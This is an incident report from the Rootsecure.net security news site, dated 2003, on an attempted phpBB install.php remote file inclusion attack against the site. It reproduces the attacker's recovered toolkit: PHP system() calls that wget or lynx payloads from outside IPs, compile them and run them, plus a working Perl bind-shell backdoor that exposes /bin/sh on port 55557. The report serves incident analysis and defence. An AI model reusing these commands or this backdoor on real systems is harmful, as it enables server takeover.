R o o t s e c u r e . n e t
The Security News Site For Systems Administrators & Hackers Monday, 22nd September 2014 @ 09:09:17 GMT 
Reports | Attempted 'hack' against Rootsecure.net
{10th Jun 2003}
Logs for Rootsecure.net recently revealed an attempt to compromise the site, using a phpBB vulnerability (from phpbb.com, ?phpBB is a high powered, fully scalable, and highly customisable open-source bulletin board?).  Here follows an account of the incident.

On the 28th of May, 2003 someone on the IP address of 57.66.3.54 (part of a block allocated to ?SITA-Societe Internationale de Telecommunications Aeronautiques? a French provider of ?Global information and communication software?) requested the page: http://www.rootsecure.net/forum/install.php?phpbb_root_dir=http://57.66.3.54/ass/

It appears the attacker was attempting to compromise Rootsecure.net using the ?Malicious PHP Source Injection in phpBB (install.php)? vulnerability discovered in April, 2002.

The first, and only hit of significance was an attempt to see if Rootsecure.net had forum software / it was vulnerable.  This would have been indicated to the attacker, by the page specified http://57.66.3.54/ass/ being ?php included? (downloaded and shown) on their screen, as the result of a HTTP ?GET? request.

After feeding the address ?http://57.66.3.54/ass/? left by the attacker, into a browser what looked like a custom phpBB ?hacking? toolkit was discovered:


  =Load.htm=

<?print "<pre>";

//system("wget");
//system("lynx");
//system("");
//system("cd /tmp;lynx -source http://57.66.3.129/bd.pl>bd.pl");
//system("cd /tmp;lynx -source http://62.118.154.149/1.c>1.c");
//cd /tmp;wget http://57.69.141.156/;

system("uname -a");

//system("cd /tmp;wget http://57.66.3.129/bd.pl;wget http://57.66.3.129/1.c;gcc 1.c -o ex;rm 1.c");

//system("cd /tmp;perl bd.pl");

//system("cd /tmp;lynx -source http://213.145.45.103/1.c>1.c;gcc 1.c -o ex");

//system("lynx -source http://213.145.45.45/bd.pl>/tmp/bd.pl");

system("cd /tmp/;ls");

print "</pre>";
?>

  =functions_selects.htm=

<?
system("cd /tmp;wget http://57.66.3.97/bd.pl;wget http://57.66.3.97/ex.c;gcc ex.c -o ex;rm ex.c;perl bd.pl");
?>

Scripts to download backdoor applications, and execute them on the remote system.

  =bd.pl=

#!/usr/bin/perl
use Socket;
$p=55557;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($p,INADDR_ANY));
listen(S,50);
while(1)
{
accept(X,S);
if(!($pid=fork)){
if(!defined $pid){exit(0);}
open STDIN,"<&X";
open STDOUT,">&X";
open STDERR,">&X";
exec("/bin/sh -i");
close X;
}
}

Actual backdoor application coded in Perl.  If successfully run it would have opened a socket listening on port 55557 for the attacker to connect to, (using telnet or similar) and execute any command of their choosing.